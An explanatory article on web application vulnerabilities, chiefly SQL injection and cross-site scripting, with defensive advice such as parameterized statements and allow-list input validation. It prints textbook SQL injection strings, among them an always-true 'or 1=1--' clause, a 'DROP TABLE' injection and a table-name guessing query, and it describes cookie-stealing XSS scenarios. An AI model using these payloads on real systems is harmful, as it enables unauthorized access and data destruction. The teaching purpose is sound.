Web site vulnerabilities: SQL injection and cross-site scripting

Running a Web server seems simple to many people, with security updates provided by server software vendors supposedly sufficient. However, tying up security issues on the server software does not protect a site from common attacks based on Web applications. These attacks exploit common Web application coding mistakes, and can lead to complete site vulnerability.

There are five common attacks on Web applications, most based on JavaScript or PHP. The five attacks are:

1. SQL injection

2. Cross-site scripting

3. Remote code execution

4. Format string attacks

5. Username enumeration

The first two attack types are widely-enough used that it's worth looking at them in more detail below. Of the others, a short summary explains what they are and how they work.

Remote code execution allows an attacked to run code on the server and directly retrieve data there. In most cases, these attacks are taking advantage of poor Web application coding, typically from the register_globals setting in PHP of from XML-RPC applications. Fortunately, these attack types are fairly rare due to changes in behavior of recent PHP versions.

Format string attacks exploit unfiltered user input fields. The attacker adds format tokens to the input that prints data in memory, provides a denial-of-service assault, or some similar action. Format string attacks are very easily handled by verifying user input properly.

Finally, username enumeration where a Web server script to verify a username and password is attacked. By feeding a series of usernames and passwords, and analyzing the error messages generated for invalid combinations, valid usernames and passwords can be detected. The number of these attacks has decreased lately due to many applications now using the same message for invalid username-password combinations. Protecting against these attacks is also easier with strong password enforcement.

SQL Injection

SQL injection exploits a database layer security hole in many applications. This is typically accomplished through a Web page user input field that accepts user entries and then uses that entry as a parameter in a SQL statement to query a database. This is a relatively common process, especially for sites that ask the user to enter a username and password, then query the SQL database to verify the user credentials. It needs to be pointed out that SQL injections differ depending on the database. SQL Server seems to be a regular target for injection attacks, and mySQL has its share. Variations in the handling of statements means some tailoring of the SQL injection attack differs a little depending on the database used.

The SQL injection vulnerability occurs when a SQL statement or user input (perhaps through a script or Web interface) is not handled properly, allowing embedded escape characters to be executed literally, essentially executing a command on the system. By expanding the embedded characters and handling them as a command, or by handling input using standard logic, unexpected behavior can be easily triggered if not properly managed by the application.

An example shows how simple this type of attack can be. We'll keep with SQL statements for this example, but injection attacks can actually be used where any user input is required. Suppose you have a SQL statement like this:

SELECT mylist FROM mytable WHERE name = $input;

where $input is input gathered from the user through a prompt or built up through several prompts to create a complex condition. Typically, the user would type something like "fred" in which case the statement would execute as:

SELECT mylist FROM mytable WHERE name = 'fred';

and return all matches to the name field. However, if the user types an input with a trailing extra single quote mark, such as "fred'", the behavior of the SQL parser changes. Typical behavior is that the single unmatched quotation mark causes a syntax error, since the command now reads:

SELECT mylist FROM mytable WHERE name = 'fred'';

How the syntax error is actually manifested depends on how the application is coded and its internal error-handling routines. Ideally, the application should return a message about an unknown user, use of illegal characters, or in some other way warn the user that their entry is invalidly formed. However, many applications do not do this properly, and the command is actually going to be interpreted literally by the SQL parser. This leaves the application open to abuse.

If the user notices this vulnerability and types the string:

fred' or 1=1--

at the input, the SQL statement parsed becomes:

SELECT mylist FROM mytable WHERE name = 'fred' or 1=1--';

The command has gone from a single component WHERE to a Boolean-based two-component clause. The second part is always true, since the two strings match, and the use of the OR ensure the entire clause is always true regardless of the first condition. (The two double dashes at the end of the user input is used to tell SQL to ignore the rest of the query, so a hanging single quote at the end of the statement does not cause a syntax error!)

This type of injection attack can yield information about the application and its databases. For example, if the user input was:

x' AND 1=(SELECT COUNT(*) FROM tablename); '

and the user made continual guesses at the tablename, the command ends up essentially executing

SELECT COUNT(*) FROM tablename;

which will display the number of records in "tablename". If the name is incorrect, the command fails, but it's easy to feed a script that changes "tablename" until something is returned. Then, the user has the name of the table and can do more damage. For example, if the SQL statement requiring input is this:

SELECT * FROM mytable WHERE name=$input;

and the user injects the string

fred; DROP TABLE mytable; --

then the SQL statement becomes:

SELECT * FROM mytable WHERE name=fred; DROP TABLE mytable; --

The actual string for the WHERE clause doesn't matter; the following statement is what causes the problems, deleting the table using its discovered name.

To return to the common issue of a username and password that is verified against a SQL database, the most common approach is to use a statement like this:

SELECT * FROM mytable WHERE username = $username AND password = $password;

where username and password are fields in mytable, and the two variables are the user input. If the user input field is not strongly typed, a user could enter this for the username:


which renders the statement to be

SELECT * FROM mytable WHERE username = 'admin'--' AND password = '';

Because the two dashes cause the rest of the command to be ignored, including the mismatched quotes and the lack of a password, the command essentially logs the user in as "admin" without a password required.

These SQL injection attacks are successful if the application does not properly handle errors, or does not use strongly types input fields. The solution for SQL injection attacks is very simple: do not allow user input to be directly embedded in SQL statement, and ensure that all user input is escaped and properly handled. Parameterized statements are the easy approach. Parameterized statements use variables or placeholders to pass user input to a SQL statement, feeding a static SQL statement.

Cross-site Scripting

Cross-site scripting is a similar technique to SQL injection, except it doesn't need a SQL database to act against. As with SQL injection, cross-site scripting is typically used against Web applications and are one of the most common forms of phishing attacks.

Cross-site scripting actually traces its history back to Netscape, when JavaScript support was introduced. It was obvious to Netscape that allowing executable code between browser and server (or vice versa) posed a major security risk, especially when more than one browser window was open and a script from one page (or site) could access data from another page (or site). For this reason, Netscape introduced the "same origin" concept, allowing interaction between pages and contents as long as they were from the same domain. This prevented code in one browser from accessing sensitive data from another site's browser window using JavaScript.

Despite the same origin approach, as well as improvements in client-side scripting language protection, cross-site scripting has become a major issue with malicious scripts served up from one site gaining access to content from another site, even across terminated browser sessions.

One form of cross-site scripting is non-persistent or reflected vulnerability. Reflected cross-site scripting is common and popular because it is very easy to use. With reflected cross-site scripting, a page of HTML with user data embedded is reflected to a user. Essentially, reflected cross-site scripting takes data from a Web client, stores it, and eventually send it back to a user in unfiltered HTML.

At first glance this may not seem too threatening, but consider the scenario where a user visits an e-commerce site and billing information such as credit card details is stored in the e-commerce site (along with username and password, most likely encrypted for security). A third party wants to retrieve the billing information for one or more customers. The attacker creates a URL that employs cross-site scripting and sends a spoofed email containing the created URL to customers looking as though it comes from the e-commerce site. Typically, the email requests the user to log in to the e-commerce site in a browser window (for security reasons!) then click on a link in the email to trigger a special offer. The URL in the email is completely valid so phishing filters will not be triggered. Since the user has logged into the e-commerce site completely legally in one browser window, and the email creates a new browser window to the same site but with the cross-site scripting URL information embedded, everything looks fine to both the user and the e-commerce site. However, the JavaScript code in the email-opened browser can now execute exactly as if it was sent as HTML from the e-commerce site. The JavaScript code can then "steal" the protected information from the e-commerce site since it would be converted from encrypted form into straight HTML and sent back to the browser (as a valid user request).

Phishing attacks are the usual target of reflected cross-site scripting. The most famous example was an attack on Google.com in late 2005 that allowed the attacker to mount phishing attacks and impersonate Google administrators.

A variation of reflected (non-persistent) cross-site scripting is persistent scripting, also called stored or HTML injection cross-site scripting. This is probably the most dangerous type of cross-site scripting attack. With persistent cross-site scripting, data from a client browser is stored on the Web server and can be later retrieved via HTML by a third party. Typically, these attacks are aimed at sites that allow users to store content for viewing by others, such as blogs, message boards, review sites, and so on. If the site is vulnerable to a persistent cross-site scripting, a third party can use JavaScript to create a script on the Web server that records specific information about other visitors, such as cookie information or user-entered data such as logins, passwords, and so on. One of the more famous persistent cross-site scripting attacks was on the Hotmail site, where all user Passport cookies (which included usernames and passwords) were recorded and sent to the attacker.

Persistent cross-site scripting is dangerous because the script attack needs to be submitted to the Web server site only once, but continues to exist and execute (and collect data) continually. Even if protection against these attacks is added later, the damage is already done.

A third type of cross-site scripting exploit is called Dom-based or local scripting. With DOM-based scripting, code is embedded in the scripting language of a client-side page. If a JavaScript code snippet accesses a URL with embedded parameters, retrieved information can be written as HTML to its own page to provide an update for the browser user.

Here's a simple example, which has code in the client-server JavaScript that retrieves a user name from the server so the page can be personalized:

var position=document.URL.indexOf("username=")+9;

if this is used in a Web URL such as "http://www.mysite.com/welcome.html", the URL request in the browser would be something like this:


and the HTML would return the message :

Hello Fred

This is a common approach for many sites, based on either cookie information or a user input string. However, if the target URL get this request instead:


then there's a major security problem (in this case the clause after username could have come from a cookie written from a visit to a suspect Web site). When the targeted URL receives this request, if parses the HTML into DOM, which calls an object called "document" which has a property for the URL. The HTML parser then reaches the JavaScript code and executes it, populating the HTML of the page with document.URL and executing the code therein, allowing an exploit. Essentially, the attack has allowed code to be executed in the victim's browser. A famous example of a DOM-based cross-site scripting was in mid 2006, when a fake news item was posted that claimed President Bush had appointed a 9 year old boy to head the Information Security Department. There were links in the item to cbsnews.com and bbc.co.uk, each of which contained JavaScript code that allowed any article of the hacker's choosing to be injected to the site.

Protecting against cross-site scripting attacks is not quite as simple as protecting against SQL injection attacks. Typically, the best protection is to ensure that all incoming data is of an approved format. A similar set of rules should control any data sent from the server. In both cases, using "known good" approaches should be used instead of rejecting "known bad" formats, to ensure better input and output controls.


The five Web application vulnerabilities explained above are the most threatening, but there are other vulnerabilities that have to be detected, managed, and defended against. Some of these other vulnerabilities tend to go in cycles, rising in popularity until Web developers are made aware of the issues and begin coding to avoid those problems by nature. A good example of this is the buffer overflow error which overloaded an application's buffer, crashed the application, and allow the session to be taken over by a remote user. Buffer overflows were widely used a few years ago, but is seen rarely lately.

The biggest issue for most Web developers and site managers is that the number of security issues that arise is far higher than the site developer's and administrator's abilities to handle them. While vulnerabilities are routinely detected and information about work-arounds and protection widely distributed, it's time-consuming and often difficult to keep up with the tide. By far the easiest approach to handling these issues is to develop Web application code that avoids most of these exploits naturally by using solid coding with proper validation or input and output, as well as sufficient specific error handling, right from the start.